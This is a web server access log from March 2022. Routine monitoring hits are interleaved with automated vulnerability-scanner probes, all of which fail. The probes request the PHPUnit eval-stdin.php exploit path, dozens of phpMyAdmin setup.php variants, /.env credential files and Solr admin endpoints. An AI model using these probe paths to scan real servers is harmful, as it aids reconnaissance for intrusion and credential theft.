212.91.246.72 - - [01/Mar/2022:23:35:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:36:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.1.248.26 - - [01/Mar/2022:23:37:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:37:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:37:48 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:23:37:52 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:45:28 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.62.127 - - [01/Mar/2022:23:45:50 +0100] "GET http://212.91.246.87:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:51 +0100] "GET http://212.91.246.87:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:51 +0100] "GET http://212.91.246.87:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:52 +0100] "GET http://212.91.246.87:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:52 +0100] "GET http://212.91.246.87:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:53 +0100] "GET http://212.91.246.87:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:53 +0100] "GET http://212.91.246.87:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:54 +0100] "GET http://212.91.246.87:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:54 +0100] "GET http://212.91.246.87:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:55 +0100] "GET http://212.91.246.87:80/phpm/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:56 +0100] "GET http://212.91.246.87:80/phpmyadmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:56 +0100] "GET http://212.91.246.87:80/phpMyAdmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:57 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:57 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:57 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
109.237.103.9 - - [01/Mar/2022:23:45:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
209.141.62.127 - - [01/Mar/2022:23:45:58 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:59 +0100] "GET http://212.91.246.87:80/php-my-admin/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:45:59 +0100] "GET http://212.91.246.87:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:00 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:00 +0100] "GET http://212.91.246.87:80/typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:01 +0100] "GET http://212.91.246.87:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:01 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:02 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:02 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
45.146.165.37 - - [01/Mar/2022:23:46:04 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
209.141.62.127 - - [01/Mar/2022:23:46:04 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:04 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:05 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:05 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 404 354 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:07 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:07 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:08 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:08 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:09 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:09 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:10 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:10 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:11 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:11 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:12 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:12 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:13 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:13 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 404 345 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:15 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:15 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:16 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:16 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:17 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:17 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:18 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:18 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:19 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:19 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:20 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:20 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:21 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:21 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:22 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:22 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:23 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:23 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:24 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:24 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:25 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:25 +0100] "GET http://212.91.246.87:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:26 +0100] "GET http://212.91.246.87:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:26 +0100] "GET http://212.91.246.87:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:27 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:27 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 404 351 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:28 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:28 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:29 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:29 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
212.91.246.72 - - [01/Mar/2022:23:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.62.127 - - [01/Mar/2022:23:46:30 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:30 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:31 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:31 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:32 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:32 +0100] "GET http://212.91.246.87:80/phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:33 +0100] "GET http://212.91.246.87:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:33 +0100] "GET http://212.91.246.87:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:34 +0100] "GET http://212.91.246.87:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:34 +0100] "GET http://212.91.246.87:80/php/phpmyadmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:35 +0100] "GET http://212.91.246.87:80/php/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:35 +0100] "GET http://212.91.246.87:80/_pma/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:36 +0100] "GET http://212.91.246.87:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:36 +0100] "GET http://212.91.246.87:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:37 +0100] "GET http://212.91.246.87:80/tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:38 +0100] "GET http://212.91.246.87:80/webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:38 +0100] "GET http://212.91.246.87:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.62.127 - - [01/Mar/2022:23:46:39 +0100] "GET http://212.91.246.87:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
45.146.165.37 - - [01/Mar/2022:23:47:21 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:49:20 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [01/Mar/2022:23:50:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:54:05 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [01/Mar/2022:23:54:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [01/Mar/2022:23:56:31 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:23:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:23:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.206.128.70 - - [02/Mar/2022:00:00:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
45.146.165.37 - - [02/Mar/2022:00:01:15 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:03:02 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.154.7.246 - - [02/Mar/2022:00:03:12 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.154.7.246 - - [02/Mar/2022:00:03:12 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:03:28 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:04:11 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:05:13 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.245.70.127 - - [02/Mar/2022:00:07:56 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [02/Mar/2022:00:07:56 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
45.146.165.37 - - [02/Mar/2022:00:12:08 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.1.248.26 - - [02/Mar/2022:00:13:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.7 - - [02/Mar/2022:00:13:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
51.254.59.113 - - [02/Mar/2022:00:20:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
23.129.64.213 - - [02/Mar/2022:00:27:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
45.128.133.242 - - [02/Mar/2022:00:27:14 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:00:28:17 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.230.216.203 - - [02/Mar/2022:00:30:47 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [02/Mar/2022:00:30:47 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
45.146.165.37 - - [02/Mar/2022:00:33:03 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
188.119.51.126 - - [02/Mar/2022:00:34:01 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
